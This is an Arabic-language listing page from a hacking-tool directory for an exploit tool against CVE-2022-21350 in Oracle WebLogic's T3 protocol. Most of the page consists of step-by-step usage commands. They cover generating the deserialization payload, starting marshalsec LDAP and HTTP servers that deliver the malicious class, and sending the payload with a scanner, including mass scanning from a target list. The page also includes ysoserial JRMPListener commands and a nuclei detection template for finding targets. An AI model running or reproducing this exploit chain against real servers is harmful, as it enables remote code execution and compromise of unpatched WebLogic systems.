Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2022-21350 — أداة استغلال لـ CVE-2022-21350 تستهدف بروتوكول Oracle WebLogic T3 مع توليد الحمولات، وخوادم LDAP/HTTP، ودعم لإصدارات متعددة من JDK. | Kitploit
أدوات/GitHubGitHub/hktalent/cve-2022-21350
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالقيادة والسيطرةتطوير الحمولات
GitHubhktalent/cve-2022-21350

CVE-2022-21350

أداة استغلال لـ CVE-2022-21350 تستهدف بروتوكول Oracle WebLogic T3 مع توليد الحمولات، وخوادم LDAP/HTTP، ودعم لإصدارات متعددة من JDK.

عرض المستودع
333منذ 2 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

لماذا اثنين من POC؟ واحد يحوي com._51pwn.hktalent.CreatJar.main(args); يُستخدم لإنشاء أداة توليد البايلود الأدنى بعد الإنشاء، استخدم الآخر

عند تشغيل CVE-2022-21350_powerBy_51pwn.jar، أخطاء بناء البايلود لا تؤثر على استخدام البايلود.

استغلالات أخرى

root@kitploit:~
CVE_2020_2551
CVE_2020_2555
CVE_2020_2883
CVE_2020_14645
CVE_2020_14756
CVE_2020_14825
CVE_2020_14841
CVE_2021_2394
CVE_2022_21306
CVE_2022_21350

كيفية الاستخدام

1- إنشاء البايلود

root@kitploit:~
docker run -d -p 7001:7001 -p 8453:8453 -v $PWD/setDomainEnv.sh:/home/weblogic/Oracle/Middleware/Oracle_Home/user_projects/domains/base_domain/bin/setDomainEnv.sh hktalent/weblogic:12.2.1.4.0

java -cp CVE-2022-21350_powerBy_51pwn.jar com._51pwn.CVE_2022_21350.Main "t3://127.0.0.1:7001/" "ldap://docker.for.mac.localhost:1389/UpX34defineClass"

2- بدء خادم LDAP

root@kitploit:~
java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer 'http://docker.for.mac.localhost:8888/#UpX34defineClass' 1389

3- بدء خادم HTTP لإرسال ملف الفئة

root@kitploit:~
node httpServer.js

4- إرسال البايلود

root@kitploit:~
py3 ../WeblogicScan.py --tags 21350 -r -v -u http://127.0.0.1:7001
# more
cat ../T3_ver.txt|awk '{print $1}'|py3 ../WeblogicScan.py --tags 21350 -r -v -s  

java -server -Xdebug -Xnoagent -Xrunjdwp:transport=dt_socket,address=8453,server=y,suspend=n -Djava.compiler=NONE -cp ysuserial-0.9-su18-all.jar org.su18.ysuserial.exploit.JRMPListener 4444 CommonsCollections1 "ping 10.12.35.59"

java -cp ysoserial-0.0.6-SNAPSHOT-all.jar ysoserial.exploit.JRMPListener 4444 CommonsCollections1 "ping 10.12.35.59" java -jar ./ysoserial-0.0.6-SNAPSHOT-all.jar CommonsCollections1 "open /System/Applications/Calculator.app" >>/Users/51pwn/MyWork/TestPoc/JRMPListener.ser

أين البايلود

root@kitploit:~
cat test.ser

لماذا رسالة الخطأ الخارجة

Running the error does not affect the generation of the payload and the effect of the payload تشغيل الخطأ لا يؤثر على توليد البايلود ولا على تأثيره

كيفية الهجوم

root@kitploit:~
nuclei -duc -t ./network/detection/weblogic-t3-detect.yaml -l list.txt

الأدوات المدعومة:

  • 1- إصدار Weblogic
  • 12.1.3.0.0
  • 12.2.1.3.0
  • 12.2.1.4.0
  • 2- JDK أقل من 1.8
  • 3- السماح بالاتصال الخارجي (OOB)

كيفية البناء ودمج الجرار

root@kitploit:~
cd lib3
# split 
py3 ../tools/splitTools.py -s wlfullclient_12.1.3.jar
# merge 
py3 ../tools/splitTools.py -m wlfullclient_12.1.3.jar

شكر خاص

  • <a href=https://github.com/lz520520>@lz520520
  • <a href=https://github.com/Y4er>@Y4er
تنزيل الأداة